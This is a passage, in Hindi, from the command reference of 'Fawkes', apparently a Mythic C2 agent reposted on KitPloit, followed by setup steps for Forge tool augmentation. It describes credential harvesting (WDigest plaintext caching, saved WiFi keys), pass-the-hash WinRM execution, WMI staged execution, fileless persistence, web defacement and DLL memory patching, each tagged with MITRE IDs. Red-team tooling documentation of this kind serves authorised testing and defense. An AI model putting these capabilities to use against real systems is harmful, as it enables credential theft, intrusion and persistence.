wc | `wc -path <file_or_dir> [-pattern <glob>]` | फ़ाइलों में पंक्तियाँ, शब्द, वर्ण और बाइट्स गिनें। ग्लोब पैटर्न फ़िल्टरिंग और योग के साथ निर्देशिका मोड। क्रॉस-प्लेटफ़ॉर्म (T1083)।
wdigest | `wdigest -action <status\|enable\|disable>` | **(केवल विंडोज)** WDigest प्लेनटेक्स्ट क्रेडेंशियल कैशिंग प्रबंधित करें। अगले लॉगऑन पर स्पष्ट पाठ पासवर्ड कैप्चर करने के लिए सक्षम करें। MITRE T1003.001, T1112.
winrm | `winrm -host <target> -username <user> [-password <pass>] [-hash <NT hash>] -command <cmd> [-shell cmd\|powershell] [-auto-verify]` or `winrm -action check -host <target> [-username <user> -password <pass>]` | NTLM प्रमाणीकरण के साथ WinRM के माध्यम से रिमोट विंडोज होस्ट पर कमांड निष्पादित करें। पास-द-हैश, cmd.exe और PowerShell का समर्थन करता है। `check` WinRM पूर्वापेक्षाएँ मान्य करता है (पोर्ट 5985/5986, प्रमाणीकरण, शेल). क्रॉस-प्लेटफ़ॉर्म (T1021.006, T1550.002)।
windows | `windows [-action list\|search] [-filter <string>] [-all]` | **(केवल विंडोज)** दृश्यमान एप्लिकेशन विंडो गणना करें — HWND, PID, प्रक्रिया नाम, विंडो क्लास और शीर्षक दिखाता है। शीर्षक/प्रक्रिया/क्लास द्वारा खोज फ़िल्टर। MITRE T1010.
who | `who [-all true]` | वर्तमान में लॉग इन उपयोगकर्ताओं और सक्रिय सत्रों को दिखाएं। लिनक्स: utmp पार्स करता है। विंडोज: WTS API. macOS: who कमांड. क्रॉस-प्लेटफ़ॉर्म (T1033)।
whoami | `whoami` | वर्तमान उपयोगकर्ता पहचान और सुरक्षा संदर्भ प्रदर्शित करें। विंडोज: उपयोगकर्ता नाम, SID, टोकन प्रकार, अखंडता स्तर, समूह सदस्यता, विशेषाधिकार। लिनक्स: उपयोगकर्ता, UID, GID, समूह, प्रभावी क्षमताएं (डिकोडेड), SELinux/AppArmor संदर्भ, कंटेनर डिटेक्शन. macOS: उपयोगकर्ता, UID, GID, समूह।
wmi | `wmi -action <execute\|query\|process-list\|os-info\|upload\|exec-staged\|check> [-target <host>] [-command <cmd>] [-query <wql>]` | **(केवल विंडोज)** COM API के माध्यम से WMI क्वेरी, प्रक्रिया निर्माण, फ़ाइल अपलोड और स्टेज्ड निष्पादन निष्पादित करें। upload: certutil/PowerShell स्टेजिंग के माध्यम से फ़ाइलें स्थानांतरित करें। exec-staged: ऑटो-क्लीनअप के साथ अपलोड करें फिर निष्पादित करें। `check` WMI पूर्वापेक्षाएँ मान्य करता है (RPC 135, WMI कनेक्टिविटी). MITRE T1047, T1570.
wmi-persist | `wmi-persist -action <install\|remove\|list> -name <id> -trigger <logon\|startup\|interval\|process> -command <exe> [-consumer_type <command\|script>]` | **(केवल विंडोज)** COM API के माध्यम से WMI ईवेंट सब्सक्रिप्शन स्थिरता। CommandLine और ActiveScript (VBScript/JScript) उपभोक्ताओं का समर्थन करता है। फ़ाइल रहित, रिबूट से बचता है। MITRE T1546.003.
wlan-profiles | `wlan-profiles [-name <SSID>]` | सहेजे गए WiFi नेटवर्क प्रोफ़ाइल और क्रेडेंशियल पुनर्प्राप्त करें। विंडोज: WLAN API, लिनक्स: NetworkManager/wpa_supplicant/iwd, macOS: कीचेन. क्रॉस-प्लेटफ़ॉर्म (T1555)।
write-file | `write-file [-action write\|deface] -path <file> -content <text> [-base64 true] [-append true] [-mkdir true] [-confirm DEFACE]` | फ़ाइलों में सामग्री लिखें, या वेब पेज विकृत करें। `write`: बनाएं/ओवरराइट करें/जोड़ें (डिफ़ॉल्ट). `deface`: विकृति संदेश के साथ वेब सामग्री बदलें (T1491, सुरक्षा गेट). क्रॉस-प्लेटफ़ॉर्म (T1105, T1491)।
write-memory | `write-memory <dll_name> <function_name> <start_index> <hex_bytes>` | **(केवल विंडोज)** एक DLL फ़ंक्शन पते पर बाइट्स लिखें।
xattr | `xattr -action <list\|get\|set\|delete> -path <file> [-name <attr>] [-value <data>] [-hex true]` | **(लिनक्स/मैकओएस केवल)** विस्तारित फ़ाइल विशेषताएँ प्रबंधित करें — सूचीबद्ध करें, प्राप्त करें, सेट करें, हटाएं। डेटा छिपाने के लिए विंडोज ADS के यूनिक्स पूरक (T1564.004)।## Forge Command Augmentation

Fawkes [Mythic Forge](https://github.com/MythicAgents/forge) कमांड वृद्धि का समर्थन करता है, जो एजेंट की क्षमताओं को बाहरी टूल संग्रहों के साथ गतिशील रूप से विस्तारित करता है। जब Forge को Mythic के साथ स्थापित किया जाता है, तो Fawkes कॉलबैक के लिए Mythic UI में अतिरिक्त कमांड स्वचालित रूप से दिखाई देते हैं — एजेंट पुनर्निर्माण की आवश्यकता नहीं है।

**समर्थित टूल संग्रह:**

| संग्रह | प्रकार | निष्पादन माध्यम | उदाहरण |
|------------|------|-------------|----------|
| [SharpCollection](https://github.com/Flangvik/SharpCollection) | .NET असेंबलियाँ | `inline-assembly` | Seatbelt, SharpUp, Rubeus, Certify, SharpHound, SharpDPAPI |
| [Sliver Armory](https://github.com/MythicAgents/forge) | BOF/COFF फ़ाइलें | `inline-execute` | SA-whoami, SA-adcs-enum, SA-ldapsearch, SA-nanodump |

### सेटअप (नई स्थापना)

**चरण 1: Forge स्थापित करें**```bash
cd /path/to/Mythic
sudo ./mythic-cli install github https://github.com/MythicAgents/forge

चरण 2: Forge की payload type support में Fawkes जोड़ें

InstalledServices/forge/payload_type_support.json को संपादित करें और JSON array में Fawkes प्रविष्टि जोड़ें:```json { "agent": "fawkes", "bof_command": "inline-execute", "bof_file_parameter_name": "bof_file", "bof_argument_array_parameter_name": "coff_arguments", "bof_entrypoint_parameter_name": "function_name", "inline_assembly_command": "inline-assembly", "inline_assembly_file_parameter_name": "assembly_file", "inline_assembly_argument_parameter_name": "assembly_arguments", "execute_assembly_command": "", "execute_assembly_file_parameter_name": "", "execute_assembly_argument_parameter_name": "", "assembly_default_execution_method": "inline_assembly" }

root@kitploit:~

Read more

टूल डाउनलोड करें